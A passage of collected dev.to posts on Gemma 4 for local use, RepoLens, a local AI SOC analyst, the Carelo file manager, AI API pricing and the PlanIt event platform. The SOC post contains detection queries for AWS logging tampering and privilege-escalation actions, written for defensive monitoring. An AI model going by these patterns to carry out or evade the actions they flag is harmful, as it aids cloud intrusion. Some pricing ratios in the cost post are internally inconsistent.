One of the biggest concerns developers have with modern AI platforms is long-term accessibility. Many popular AI systems initially attract users with free access but later move advanced capabilities behind expensive subscriptions or paid APIs.
However, Gemma 4 follows a fundamentally different philosophy.
Google released Gemma 4 under the permissive Apache 2.0 open-source license, which gives developers permanent legal rights to use, modify, and distribute the model. This license is irrevocable, meaning users who download the model can continue using it freely for both personal and commercial projects. Once the model exists on a user's device, it cannot suddenly be locked behind a paywall.
This creates a major difference between open-weight AI and closed cloud AI systems.
When developers use cloud-only AI platforms, the provider controls:
access,
pricing,
usage limits,
and subscriptions.
But with Gemma 4, developers actually own the downloaded model files locally on their machine. Since the AI can run completely offline, Google has no technical control over how frequently users run the model or what projects they build with it.
This is especially important for:
students,
startups,
independent developers,
educational institutions,
and developers in countries with economic limitations.
A student in Pakistan can install Gemma 4 on a laptop and continue learning AI development without worrying about monthly subscriptions, API quotas, or increasing token costs.
Even commercial use is allowed. Developers can build applications, automate workflows, create AI tools, or launch startups using Gemma 4 without paying royalties or licensing fees.
Of course, Google still offers paid cloud infrastructure services for organizations that want managed hosting through platforms like Google Cloud Vertex AI. But the core Gemma 4 model itself remains free for anyone who chooses to run it locally.
This open model approach is one of the strongest reasons why Gemma 4 represents more than just another AI release — it represents a long-term shift toward accessible and developer-owned artificial intelligence.
A Game-Changer for Pakistan — and Every Developing Nation
Let us be specific. Let us talk about Pakistan.
Pakistan has over 300,000 IT graduates per year and a rapidly growing freelance economy. Pakistani developers are talented, creative, and hungry to build. But the AI tools that define modern development — tools that are becoming as essential as a code editor — have been largely out of reach for economic and infrastructure reasons.
Gemma 4 changes this in a profound way.
The Internet Problem
Pakistan's internet is improving, but it remains expensive relative to income. A 100 Mbps fiber connection might cost PKR 3,000–5,000 per month — a significant expense for a junior developer. Mobile data packages are even more restricted.
Cloud-based AI makes this worse. Every API call consumes bandwidth. A productive day of coding with an AI assistant can easily consume hundreds of megabytes of data. With capped packages, this is simply not sustainable.
Gemma 4 uses zero data after the initial download. Download the model once on a good connection — at a university, a cafe, or a friend's place. Then use it forever. On a plane. In a village with no cell signal. During load-shedding with a UPS. The AI keeps working.
The Cost Problem
The economics of commercial AI APIs are brutal for developers in lower-income countries. OpenAI's GPT-4o costs $5–15 per million tokens. At production scale, this can run into thousands of dollars per month. ChatGPT Plus costs $20/month just for personal use — nearly half a week's salary for many junior Pakistani developers.
With Gemma 4, the cost of running AI in your application is exactly zero beyond your electricity bill. A developer in Multan can build the same AI-powered product as a developer in Mountain View. The playing field, for the first time, is genuinely level.
The Privacy Problem
When you send code or client data to a foreign cloud API, that data leaves your country. For Pakistani startups handling user information, this raises legitimate legal and ethical questions about data sovereignty.
With Gemma 4, your data never leaves your device. Your prompts, your code, your client information — none of it is ever transmitted anywhere. This is not just a privacy feature. It is a data sovereignty feature.
**
What This Means for Developers: The Technical Benefits**
Beyond connectivity and cost, Gemma 4 offers technical capabilities that make it genuinely powerful for backend development.
Zero-Cost Backend AI Integration
The traditional architecture for an AI-powered backend: your server receives a request, calls the OpenAI or Gemini API, waits for a response, and returns it. You pay for every single call.
With Gemma 4, you host the model on your own server. Your server receives a request, calls the local Gemma 4 instance, and gets a response. The cost per call: nothing. For a Pakistani startup with limited runway, this can mean the difference between a viable product and one that burns through its budget before finding users.
Massive Context Window
The E2B and E4B models support a 128,000 token context window. The 26B and 31B models support 256,000 tokens. You can feed an entire codebase, a full documentation set, or a lengthy technical specification into a single conversation.
For Pakistani freelancers who are often handed large, undocumented legacy codebases by international clients, this is transformative. Drop the entire codebase into Gemma 4 and ask it to explain the architecture, identify issues, or suggest refactoring strategies.
Function Calling and Agent Capabilities
Gemma 4 supports native function calling — meaning it can output structured JSON to interact with your APIs, databases, or external services. You can build AI agents that actually do things rather than just talk about them. All of this runs locally, with no external calls and no costs.
Thinking Mode for Hard Problems
Gemma 4 includes a Thinking Mode that forces the model to reason through a problem step by step before giving a final answer. Instead of getting a confident-but-wrong response, you get a transparent reasoning chain you can follow and critique. This is especially valuable for debugging complex issues or working through architectural decisions.
Multimodality: Vision and Audio
All Gemma 4 models support image input. The smaller models also support audio. Practical uses: screenshot a UI bug and ask Gemma 4 to identify the CSS causing it. Take a photo of a whiteboard architecture diagram and ask it to generate the corresponding code. Record a client meeting and have it extract the technical requirements.
Getting Gemma 4 running on your machine takes about ten minutes.
Option 1: Ollama (Best for Developers)
Ollama is a free, open-source tool that manages local AI models. Download it from ollama.com, then run this in your terminal:
ollama run gemma4:e4b
Ollama downloads the model and launches an interactive chat interface. Ollama also exposes a local REST API, so you can call Gemma 4 from your backend exactly like you would call the OpenAI API — but for free, on your own machine.
Option 2: LM Studio (Best for Beginners)
LM Studio provides a graphical interface — no terminal required. Download it from lmstudio.ai, search for Gemma 4, pick your model size, and start chatting. It also includes a local API server for backend integration.
Conclusion: The Democratization of AI
The history of technology has a recurring pattern. Powerful tools start as expensive, centralized services accessible only to well-funded companies in wealthy countries. Then they get open-sourced and distributed to everyone.
We are watching that pattern play out with AI right now.
Gemma 4 is not just a good model. It is a signal that the era of AI as a paid cloud utility — one that systematically excludes developers from lower-income countries — is coming to an end.
For a developer in Pakistan, running Gemma 4 means you can compete. You can build AI-powered products without a cloud budget. You can work without a reliable internet connection. You can keep your client's data private and secure. You can experiment freely without worrying about API bills.
Google did not just release a model. They released a piece of infrastructure — as fundamental and free as a web server — that every developer on earth can now build on.
That is a massive achievement, and it deserves to be celebrated🥳.
Try it today: download Ollama from ollama.com or LM Studio from lmstudio.ai, and run your first local AI model in under ten minutes.

---
## I lost 3 enterprise clients in one night because of a GitHub repo. So I built a tool to make sure it never happens again.

> Published: 2026-05-24 04:19:35+00:00
> Source: https://dev.to/apples_one_cd174284bffb/i-lost-3-enterprise-clients-in-one-night-because-of-a-github-repo-so-i-built-a-tool-to-make-sure-4fbc
> wpnews: https://wpnews.pro/news/i-lost-3-enterprise-clients-in-one-night-because-of-a-github-repo-so-i-built-a

The article describes how a developer lost three enterprise clients (worth $120,000 annually) after a single night of downtime caused by an unvetted GitHub library with a known security vulnerability and no recent maintenance. In response, the author built RepoLens, a tool that analyzes any GitHub repository in seconds and provides a health score, commit activity, language breakdown, and contributor data to help developers quickly assess a project's reliability.

It was 11:47 PM on a Tuesday.
I had just pushed to production.
Closed my laptop. Made tea. Felt good about myself.
By 3:14 AM my phone was a disaster.
17 missed calls. 43 Slack messages. 6 emails.
The subject line on the first email read:
"URGENT — Platform completely down"
My hands were shaking before I even opened it.
Three weeks earlier I had been under insane deadline pressure.
We were building a SaaS product for enterprise clients.
Launch was in 72 hours.
I needed an authentication library fast.
I went to GitHub.
Found one that looked incredible.
Clean name. Professional README.
2,400 stars. 340 forks.
The code looked solid on first glance.
I did what most developers do under deadline pressure.
I added it. Shipped it. Went to sleep.
What I didn't check:
The last commit was 9 months ago.
There were 47 open issues marked as critical.
Zero CI/CD pipeline.
Zero test files in the entire repo.
The maintainer had responded to exactly 0 issues in 6 months.
There was a known security vulnerability reported 4 months ago.
Still open. No response. No fix.
In 3 seconds I could have seen all of this.
I didn't check. So I didn't know.
Until 3am.
The bug triggered under high concurrent load.
Our enterprise demo that night had 200 simultaneous users.
The library collapsed. Took the auth system with it.
Every single user got logged out.
Sessions destroyed. Data in a corrupted state.
The whole platform returned a 500 error for 14 straight hours.
We lost 3 enterprise clients that week.
Each worth $40,000 annually.
$120,000 gone because I didn't spend 3 minutes
checking a GitHub repo properly.
My manager didn't fire me.
But the look on his face in that Monday meeting
is something I will never forget as long as I live.
After that I became obsessive.
I started checking every single dependency manually.
Every library. Every tool. Every npm package.
Every GitHub repo anyone on the team suggested.
I built a personal checklist:
→ When was the last commit?
→ Is there a CI/CD pipeline?
→ Are there test files?
→ How many open issues vs closed?
→ What is the average time to close an issue?
→ Who are the contributors and are they still active?
→ Is there a license?
→ How long and detailed is the README?
→ What does the community size look like?
→ Are there known CVEs in the dependencies?
20 to 30 minutes per repo.
Every single time.
My team thought I was paranoid.
I thought I was just finally doing my job properly.
Four months later I had evaluated hundreds of repos this way.
And I was completely burned out from doing it manually.
Every evaluation felt like the same work.
The same checks. The same tabs. The same mental process.
Over and over and over.
I started thinking about the developers who don't do this at all.
The ones who are exactly where I was at 11:47 PM on that Tuesday.
Feeling good. Laptop closed. Tea in hand.
Not knowing what's coming.
So I spent three weeks and built RepoLens.
Not for clout. Not for a portfolio piece.
Because I genuinely needed it.
And I was pretty sure millions of other developers did too.
Here is what it does:
Paste any GitHub URL.
In 3 seconds you get:
🏥 Repository Health Score — 0 to 100
A single score computed across 7 quality dimensions.
README quality. Commit activity. Test detection.
CI/CD presence. License. Community size. Issue resolution.
One number that tells you everything.
With a letter grade. A B C D.
So you know in 1 second if this is production-ready.
🥧 Language Breakdown
A beautiful interactive pie chart showing every single language
used in the codebase with exact percentages.
Know the full technical makeup before you touch it.
🔥 52-Week Commit Heatmap
A GitHub-style activity grid showing every week of the past year.
See at a glance — is this project alive or abandoned?
Spot burnout periods. Spot release sprints.
Spot the exact week the maintainer stopped caring.
👥 Top Contributor Graph
Who actually built this thing?
Are they still active?
Is it one person or a healthy team?
Bar chart. Avatars. Contribution share visualization.
Everything you need to know about who drives this project.
📦 Smart Dependency Detection
Automatically parses every ecosystem file:
package.json for Node.
requirements.txt and pyproject.toml for Python.
Cargo.toml for Rust.
go.mod for Go.
pom.xml for Java.
Gemfile for Ruby.
Every package. Every version. Automatically.
🗂 Interactive File Tree
Collapsible directory explorer with file type icons.
See the structure of any codebase instantly.
Search and filter in real time.
📖 Beautiful README Renderer
Full GitHub Flavored Markdown.
Images. Tables. Code blocks. Everything.
Read the documentation without leaving the tool.
📤 One-Click Share Card
Export a beautiful PNG summary card.
Share on LinkedIn. Post on Twitter.
Send to your team before a code review.
I ran the library that destroyed my production server through it.
31 out of 100. Grade D.
In 3 seconds.
The exact score I needed at 11:47 PM on that Tuesday
instead of at 3:14 AM the next morning.
I've been using RepoLens every single day since I built it.
My entire team uses it now before every dependency decision.
We have a rule — no new library gets added without a score.
We haven't had a single library-related production incident since.
Not one.
I'm sharing it completely free.
No sign-up required.
No account.
No credit card.
No limits.
Works on every public GitHub repository on the planet.
Instant results. Every time.
And the entire thing is open source.
React 18 frontend. Vite. Tailwind CSS.
FastAPI Python backend. GitHub REST API only.
File-based caching. Rate limiting. Security headers.
Full type hints. Clean architecture.
If you want to see how it's built — every line of code is there.
If you want to contribute — PRs are open.
If you want to self-host it — full Docker support.
⭐ Star it on GitHub:
github.com/vignesh2027/GitHub-Repo-Analyzer
Drop any GitHub repo URL in the comments below.
I will personally reply to every single one
with its health score and what I'd fix first.
And tell me —
What's the worst GitHub repo you ever trusted?
What happened?
Because I have a feeling I'm not the only one
who learned this lesson the hard way.

---
## Building a Local AI SOC Analyst on an M1 MacBook Pro

> Published: 2026-05-24 04:16:29+00:00
> Source: https://dev.to/mike_anderson_d01f52129fb/building-a-local-ai-soc-analyst-on-an-m1-macbook-pro-2cl9
> wpnews: https://wpnews.pro/news/building-a-local-ai-soc-analyst-on-an-m1-macbook-pro

The article describes the development of a local AI-powered SOC analyst that runs on an M1 MacBook Pro, designed to assist with daily security operations by triaging and analyzing alerts from existing cloud-native monitoring tools like Datadog, PagerDuty, and Sysdig. The solution uses Ollama to run local models (llama3.2:3b and qwen3:8b) within a Python harness, focusing on summarizing findings, correlating evidence, and producing daily security notes without automating production changes. A key lesson was that the model alone was insufficient; success required combining the right model with controlled prompts, use-case-driven analysis, and realistic hardware expectations.

We started with a practical SOC problem: build an AI-based SOC analyst that runs locally on an M1 MacBook Pro and helps with daily security operations across an existing cloud-native monitoring and alerting stack.
The environment already had strong telemetry and alerting coverage:
The problem was not lack of logs or alerts. The real challenge was analyst workflow. The SOC still needed a repeatable way to review alerts, correlate evidence, summarize findings, identify missing context, and produce daily security notes without manually jumping between tools every time.
The working solution became a local AI SOC analyst pattern:
Ollama Local model runner
llama3.2:3b Stable default model for M1 daily SOC work
qwen3:8b Optional larger model for focused deeper analysis
Python harness SOC workflow, prompts, guardrails, and integrations
AI runner CLI Analyst-facing command-line interface
Datadog Primary log, signal, dashboard, and monitoring source
PagerDuty Alert and incident routing source
Sysdig Separate runtime policy signal source
Human analyst Final decision authority
The important lesson was that the model alone was not the solution. The working solution came from combining the right model, a controlled harness, bounded prompts, use-case-driven analysis, and realistic expectations about local MacBook hardware.
The goal was to build a local AI-based SOC analyst on an M1 MacBook Pro.
The main telemetry flow looked like this:
AWS CloudTrail
AWS Security Hub
Route53 VPC DNS Firewall
SES
SNS
Cloudflare logs
Application logs
GitHub audit logs crawler
|
v
Datadog
|
v
Datadog Cloud Security rules
Datadog monitors
Datadog dashboards
|
v
PagerDuty
Sysdig was separate:
Kubernetes runtime activity
|
v
Sysdig runtime policies
|
v
PagerDuty
That distinction mattered. Datadog was the central place for logs, detections, monitors, and dashboards. Sysdig was not sending its logs to Datadog, so Sysdig alerts had to be treated as a separate runtime security signal path.
The expected solution was not a generic local chatbot. The expected solution was a repeatable local SOC assistant that could support:
We made one important architectural decision early: the local AI model should not become the detector.
Datadog and Sysdig already perform that role:
The local AI should sit above those systems as a triage and analysis layer.
That means the AI helps answer:
This keeps the control boundary clean. Detection stays with Datadog and Sysdig. Alerting stays with PagerDuty. The local AI helps the analyst move faster, ask better questions, and document the investigation more consistently.
The final working architecture was intentionally simple:
+------------------------------+
| AWS / Cloudflare / GitHub |
| Apps / SES / SNS / DNS FW |
+---------------+--------------+
|
v
+---------+
| Datadog |
| Logs |
| Signals |
| Metrics |
| Monitors|
+----+----+
|
v
+---------+
|PagerDuty|
+----+----+
+------------------+ +---------+
| Sysdig Runtime |------->|PagerDuty|
| Policies | +---------+
+------------------+
|
v
+------------------------------+
| Local AI SOC Analyst |
| M1 MacBook Pro |
| |
| Ollama |
| llama3.2:3b / qwen3:8b |
| Python SOC Harness |
| AI Runner CLI |
+------------------------------+
The local AI analyst was designed as read-only first.
It can summarize, correlate, recommend, and draft. It should not automatically make production changes.
Human approval should still be required for actions such as:
This matters because a wrong automated containment action can create a larger operational incident than the original alert.
The AI runner is the analyst-facing command-line interface.
It is what we run during daily operations.
Examples:
python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
python ai_runner.py security-signals --hours 24
python ai_runner.py pagerduty --hours 24
python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The runner coordinates the work:
The runner is not the intelligence layer by itself. Its value is operational discipline. It prevents the analyst from manually copying logs, manually selecting prompts, manually formatting output, and manually saving results every time.
The harness is the control layer around the model.
This is the difference between a chatbot and a SOC workflow tool.
The harness handles:
The harness gives the model boundaries.
For SOC operations, this is critical. A local AI model should not receive an unbounded pile of logs and be asked, “Is anything bad?” That produces weak output and increases hallucination risk.
Instead, the harness asks focused questions:
The model reasons. The harness controls the task.
At first, a larger model such as qwen3:8b
looked attractive because the problem involved cloud logs, security reasoning, and structured analysis.
That was a reasonable starting point. Larger models can be useful when the event bundle is small and the question requires deeper reasoning.
However, the target machine was an M1 MacBook Pro, not a dedicated GPU workstation. That changed the practical answer.
During testing, the first small triage workflow succeeded, but the machine became sluggish. Later, the heavier daily report failed with a local Ollama timeout:
ReadTimeout: HTTPConnectionPool(host='127.0.0.1', port=11434): Read timed out. (read timeout=300)
That error was useful because it showed:
So the issue was not the SOC design. The issue was local inference load: model size, prompt size, timeout, and hardware limits.
The model strategy was adjusted:
The final default became:
SOC_MODEL=llama3.2:3b
SOC_FAST_MODEL=llama3.2:3b
This was the right operational tradeoff.
A smaller model that finishes reliably is more useful than a larger model that freezes the analyst workstation or times out during daily operations.
The M1 MacBook Pro can run useful local AI workflows, but the workflow must be tuned.
The main constraints were:
The fix was not to abandon the local approach. The fix was to make the workflow smaller and more controlled:
Use a smaller default model.
Limit daily prompt size.
Start with 6-hour reports.
Increase to 24 hours after validation.
Increase the Ollama timeout where needed.
Avoid sending excessive raw logs to the model.
Use focused use-case prompts.
That is what made the solution usable.
ollama ps
Showing Nothing
When checking which model was running, ollama ps
returned nothing.
That does not always mean something is broken.
ollama ps
shows models currently loaded in memory. If the model finished and unloaded, it may show nothing.
Useful checks:
ollama list
Shows installed models.
ollama ps
Shows currently loaded models.
ollama run llama3.2:3b
Manually starts a model.
This distinction helped avoid misdiagnosing a normal Ollama state as a failure.
The Mac became sluggish after running the local model.
The likely cause was local inference load, especially if a larger model was used.
The fix was to run the smaller model first:
SOC_MODEL=llama3.2:3b python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
For stability, Ollama can also be limited:
export OLLAMA_NUM_PARALLEL=1
export OLLAMA_MAX_LOADED_MODELS=1
export OLLAMA_KEEP_ALIVE=30m
The daily command failed because the model did not return within the configured timeout:
ReadTimeout: HTTPConnectionPool(host='127.0.0.1', port=11434): Read timed out. (read timeout=300)
The fix had three parts:
llama3.2:3b
for daily reports.A safer first run was:
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 6 --out reports/daily_soc_report.md
Then scale to:
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The lesson: daily reports should summarize bounded evidence, not feed unlimited raw logs into a local model.
The first successful test used a sample CloudTrail StopLogging
event.
That is a meaningful test because attempts to stop CloudTrail logging may indicate defense evasion, unauthorized administrative activity, or compromised credentials.
The AI produced a high-risk SOC-style result similar to:
{
"severity": "High",
"confidence": 85,
"disposition": "true_positive",
"summary": "Suspicious attempt to stop CloudTrail logging...",
"suspicious_indicators": [
"StopLogging event by IAM user 'svc-deploy'",
"Source IP 203.0.113.45",
"User agent python-requests/2.32"
]
}
This proved the core workflow:
Local venv works.
Dependencies are installed.
AI runner executes.
Harness builds the prompt.
Ollama receives the request.
Local model returns SOC-style analysis.
The next improvement was to tighten expected output so the model always includes missing evidence and recommended follow-up queries. For production SOC use, those fields matter because they keep the analyst grounded in evidence.
Use case:
UC-006.3-cloudtrail-logging-disabled
Purpose:
Investigate possible CloudTrail tampering or defense evasion.
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudtrail @evt.name:(StopLogging OR DeleteTrail OR UpdateTrail OR PutEventSelectors)' \
--hours 24 \
--use-case UC-006.3-cloudtrail-logging-disabled
Follow-up evidence should include:
Use case:
UC-007-iam-privilege-escalation
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudtrail @evt.name:(AttachUserPolicy OR PutUserPolicy OR CreateAccessKey OR UpdateAssumeRolePolicy OR PassRole)' \
--hours 24 \
--use-case UC-007-iam-privilege-escalation
The AI should help determine whether the activity was expected administration, automated deployment behavior, or suspicious privilege escalation.
Use case:
UC-011-cloudflare-waf-attack
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudflare (@action:block OR @action:challenge OR @security_action:block)' \
--hours 24 \
--use-case UC-011-cloudflare-waf-attack
The AI should summarize source distribution, attacked paths, WAF actions, spike patterns, and whether any traffic bypassed protections.
Use case:
UC-010-route53-dns-firewall-blocks
Example command:
python ai_runner.py datadog-query \
--query 'source:route53resolverdnsfirewall OR source:route53 @action:block' \
--hours 24 \
--use-case UC-010-route53-dns-firewall-blocks
The AI should help identify suspicious domains, affected workloads, recurring clients, and whether the blocked activity suggests malware, misconfiguration, or expected testing.
Use case:
UC-014-github-audit-risk
Example command:
python ai_runner.py datadog-query \
--query 'source:github (@action:*deploy_key* OR @action:*repo* OR @action:*workflow* OR @action:*branch_protection*)' \
--hours 24 \
--use-case UC-014-github-audit-risk
The AI should focus on risky repository changes, workflow changes, deploy key activity, branch protection changes, and unusual administrative actions.
Those mentioned cases are one of few. The possibility is huge here. If you can follow the architecture then success will be yours.
The stable workflow became:
ollama serve
cd /Users/tariqual/Documents/local_ai_soc_analyst
source .venv/bin/activate
ollama list
python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 6 --out reports/daily_soc_report.md
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The report should be reviewed for:
The daily report is an analyst aid. It is not an automatic incident declaration.
The final solution works because it respects both the SOC workflow and the hardware.
It does not try to make the local model do everything.
It uses the existing security stack correctly:
Datadog detects and stores telemetry.
Sysdig detects runtime policy violations.
PagerDuty routes alerts.
The local AI harness gathers and structures evidence.
The model reasons over bounded context.
The analyst makes the final decision.
That is a realistic AI SOC operating model.
A strong model without a

---
## Carelo: A Modern Dual-Pane File Manager for Linux

> Published: 2026-05-24 04:13:10+00:00
> Source: https://dev.to/aheinze/carelo-a-modern-dual-pane-file-manager-for-linux-39c7
> wpnews: https://wpnews.pro/news/carelo-a-modern-dual-pane-file-manager-for-linux

Carelo is a modern dual-pane file manager for Linux, built with Tauri and Rust, designed to address the gap between polished macOS file managers like ForkLift and Linux's existing options. It features dual-pane browsing with tabs, rich previews for common media types, remote storage support, and fuzzy file search, prioritizing efficient local file operations and keyboard-driven workflows. The application aims to provide a current, practical file management experience for users transitioning from macOS to Linux.

Moving from macOS to Linux is usually easier than people expect. The terminal is excellent, package managers are powerful, window managers are flexible, and most development workflows feel at home quickly.
Then you start looking for a file manager.
Not just a basic file browser. A real dual-pane file manager. Something that lets you compare folders, move files with confidence, work with remote storage, preview content, open a terminal when needed, and keep your hands on the keyboard. Something modern enough to feel like it belongs on a current desktop, but practical enough to handle daily work.
On macOS, ForkLift fills that role well for me. It is polished, fast, and built around the kind of workflows power users actually repeat every day. After using that kind of tool, switching to Linux can feel surprisingly rough. Linux has capable file managers, and some classic dual-pane tools are extremely powerful, but the choices often fall into two categories: beautiful single-pane desktop browsers, or older commander-style tools that prioritize capability over modern interaction design.
Carelo started from that gap.
A dual-pane file manager is not just about showing two folders side by side. That is the easy part.
The real value is flow.
You want to keep a project folder on the left and a build output folder on the right. You want to copy assets from Downloads into a repo, inspect a PDF, rename a file, archive a folder, jump into a remote server, compare locations, and keep moving. You want drag and drop when it is faster, keyboard shortcuts when they are faster, and a preview panel when opening another app would break focus.
Linux has tools that cover pieces of this. Nautilus integrates well with GNOME. Dolphin is mature and feature-rich. Midnight Commander is still great in the terminal. Krusader is powerful. But if you are coming from a polished macOS dual-pane workflow, the overall experience can still feel fragmented.
Carelo is an attempt to build the file manager I wanted after moving from macOS to Linux: modern, local-first, dual-pane by default, and designed for everyday file work rather than nostalgia.
Carelo is a desktop file manager built with Tauri and Rust. It focuses on fast local file operations, dual-pane browsing, rich previews, remote storage, archives, and configurable tools.
The core idea is simple: keep the interface familiar, but make the workflow feel current.
Carelo is not trying to hide the filesystem or turn file management into a cloud dashboard. It is for people who know where their files live and want a better way to work with them.
Carelo starts with the dual-pane model because that is still the most efficient layout for many real tasks. Copying, moving, comparing, extracting, staging, and organizing files all benefit from seeing source and destination at the same time.
Each pane can have its own tabs, so you can keep multiple working locations open without losing context. The app also supports list, grid, and column views, making it possible to switch between dense file operations and more visual browsing depending on the folder.
The goal is not to force one workflow. It is to make common workflows cheap.
One of the biggest workflow breaks in file management is opening files just to know what they are.
Carelo includes a preview panel for metadata and common media types. Images, audio, video, PDFs, and text-like content can be inspected without leaving the file manager. The preview panel also shows practical file details such as size, timestamps, owner, group, permissions, and path information.
This matters more than it sounds. When you are cleaning up downloads, checking exported assets, reviewing documents, or comparing similar files, preview speed directly affects how focused the work feels.
Carelo has two search modes.
Fuzzy file search helps jump to files and folders by name. It is built for quick navigation inside the current location and streams partial results while scanning. Content search looks inside files, supports plain text streaming, and can search extracted text from formats such as PDFs and Office-style documents where supported.
Both search paths are cancellable and report progress through the current work indicator. That matters on large folders and remote locations, where a search should never make the app feel stuck.
A Linux file manager should not stop at the local disk.
Carelo supports remote volumes such as SFTP, FTP, SMB/CIFS, WebDAV, and S3-compatible storage through its remote storage layer. Remote locations appear in the sidebar, can be browsed in panes, and participate in normal file workflows where possible.
The goal is to make a remote server or NAS feel like part of the same working environment, without forcing every operation through a separate app.
Archives are part of file management, not a separate chore.
Carelo supports browsing and extracting archives, along with archive creation for common formats including ZIP, TAR, TAR.GZ, TAR.ZST, and 7Z. Long-running archive operations show progress and can be cancelled.
That makes archives behave more like file operations and less like modal interruptions.
Power users always have their own tools.
Carelo includes configurable context-menu tools, so commands such as opening a path in an editor can be added without changing the app. Tool commands can use placeholders like the selected path, and availability can be scoped to files, folders, or specific extensions.
The point is not to guess everyone’s setup. It is to make the setup configurable enough that Carelo can fit into yours.
You should, if they work for you.
Dolphin, Nautilus, Krusader, Double Commander, Midnight Commander, and others all have strengths. Carelo exists because none of them quite matched the experience I wanted after moving from ForkLift to Linux.
The missing piece was not one checkbox feature. It was the combination:
Carelo is built around that combination.
Carelo is for developers, designers, sysadmins, content workers, and Linux desktop users who spend real time moving through folders.
It is for people who want more than a simple file browser, but do not want to live entirely inside a terminal file manager.
It is for people who miss the feel of tools like ForkLift, but want something that fits a Linux-first workflow.
Carelo is still evolving, and that is part of the point. File managers are deeply personal tools. The only way to make one good is to use it, hit the rough edges, and keep sanding them down.
The direction is clear:
Linux deserves modern file management tools that are not just ports, clones, or nostalgia projects.
Carelo is one attempt to build that.

---
## AI API Pricing in 2026: What You Actually Pay for GPT-5.5, Claude Opus, Gemini, and 20+ Models

> Published: 2026-05-24 04:11:27+00:00
> Source: https://dev.to/neverknowsbest_5e174c23a3/ai-api-pricing-in-2026-what-you-actually-pay-for-gpt-55-claude-opus-gemini-and-20-models-3ani
> wpnews: https://wpnews.pro/news/ai-api-pricing-in-2026-what-you-actually-pay-for-gpt-5-5-claude-opus-gemini-and

According to the article, AI API pricing in 2026 is highly fragmented, with a 300x difference between the cheapest and most expensive models; for example, a prompt costing $30 on GPT-5.5 costs only $0.28 on DeepSeek V4 Flash. The article emphasizes that prompt caching can save up to 90-99% on costs, though Anthropic charges a 25% premium on cache writes, making it only cost-effective if the same prefix is used three or more times. The key takeaway is to match the model to the task, use caching aggressively, and route most traffic to budget models to significantly reduce API bills.

A prompt that costs $30 on GPT-5.5 costs $0.28 on DeepSeek V4 Flash. That's a 100x difference — and it's real.
If you're building on AI APIs, the pricing landscape in 2026 is more fragmented than ever. Four major providers, twenty-plus models, and pricing tiers that include cache reads, cache writes, batch discounts, promotional pricing, and hidden thresholds. I built a token cost calculator to make sense of it. This is the pricing data behind it.
All prices are per million tokens (MTok) in USD, sourced from official provider docs as of May 2026.
Here's the full picture — all 20 models from cheapest to most expensive on input:
* DeepSeek V4 Pro: 75% promotional discount until May 31, 2026.
The Ratio column is output-to-input price. DeepSeek's 2x ratio means output tokens are proportionally much cheaper — important if your app generates long responses.
*5K input + 500 output tokens per request
Gemini 3.1 Pro is 2.5x cheaper than GPT-5.5 on input. But it doubles pricing for prompts over 200K tokens — a hidden cost that catches people off guard.
If your app sends the same system prompt or tool definitions repeatedly, caching matters more than base pricing. All providers offer ~90% savings on cached tokens, except DeepSeek which offers 98-99%.
The catch: Anthropic charges a 25% premium on cache writes. You pay $6.25/M instead of $5.00 the first time Opus processes a prefix. This means caching only saves money if you send the same prefix 3+ times within the cache TTL window. OpenAI and Google don't charge this premium — they just give you the discount.
For a detailed breakdown, see How to Save 90% on AI API Costs with Prompt Caching.
Use a budget model when:
Stick with a frontier model when:
The smartest architecture routes 90% of traffic to a $0.10/M model and reserves the $5.00/M model for the 10% that actually needs it.
AI API pricing has collapsed. The gap between the cheapest and most expensive models is 300x on input and 450x on output. The key is matching the model to the task. Don't pay GPT-5.5 prices to classify emails. Don't use Flash-Lite to write complex code. Use caching aggressively, pick the right tier, and your API bill drops from a line item to a rounding error.
Full pricing tables for all 20+ models, including cache write/read tiers, batch pricing, and provider-specific notes: Complete API Pricing Comparison
I built tokencostcalc.com — a free token cost calculator. No ads, no affiliate links, no tracking. Just pick a model, enter your token usage, and see the actual cost.

---
## I Built a Free Offline-First Event Operations Platform at 13. Here's Why the Architecture Is Different.

> Published: 2026-05-24 04:07:13+00:00
> Source: https://dev.to/planit_06fdce959aa8b2466c/i-built-a-free-offline-first-event-operations-platform-at-13-heres-why-the-architecture-is-1bf5
> wpnews: https://wpnews.pro/news/i-built-a-free-offline-first-event-operations-platform-at-13-here-s-why-the-is

The article describes PlanIt, a free offline-first event operations platform built by a 13-year-old to solve coordination failures that occur during live events. Unlike traditional event software like Eventbrite or Cvent, which assume reliable internet and pre-registered staff, PlanIt caches attendee lists locally for uninterrupted check-in, uses PIN-based staff login for instant access, and includes a built-in walkie-talkie system for real-time communication. The platform prioritizes the operational layer of event execution over marketing and registration features.

Most event software is built around a fantasy.
The fantasy is that when you are running a real event, the WiFi works, your volunteers have personal accounts, your devices are dedicated, and nothing goes wrong at the door. Every major platform, Eventbrite, Whova, Cvent, is architected around that assumption. The server is the source of truth. Everything routes through the cloud. If the connection drops, the system stops.
I have watched that assumption fail in real environments. Lines back up. Staff switch to WhatsApp. Someone pulls out a spreadsheet. The software that was supposed to help becomes the thing people work around.
That is the problem I built PlanIt to solve.
The event software industry made a decision early on. It decided that events are primarily a registration and marketing problem. So it built registration pages, ticket sales, attendee engagement tools, sponsor dashboards, and email campaigns.
Those are real problems. But they are not the problems that kill an event on the day itself.
What kills an event on the day is coordination failure. The check-in desk falls behind because a device lost connection. Staff at two entrances have different information. A volunteer cannot log in because the organiser forgot to create their account. The team is split across three WhatsApp threads trying to figure out what is happening.
Nobody built software for that layer. So I did.
PlanIt is a free hosted event operations platform. It is not trying to be Eventbrite. It is trying to be the coordination layer that makes the day itself work.
Here is what that means in practice.
Every device running PlanIt caches the full attendee list locally. When internet connectivity drops, check-in continues without interruption. Scans are queued locally and sync automatically the moment connection is restored. Conflict resolution handles duplicate scans across entrances.
This is not a stretch goal or a future feature. It is the foundation the system is built on, because I designed around the assumption that connectivity will fail, not that it will hold.
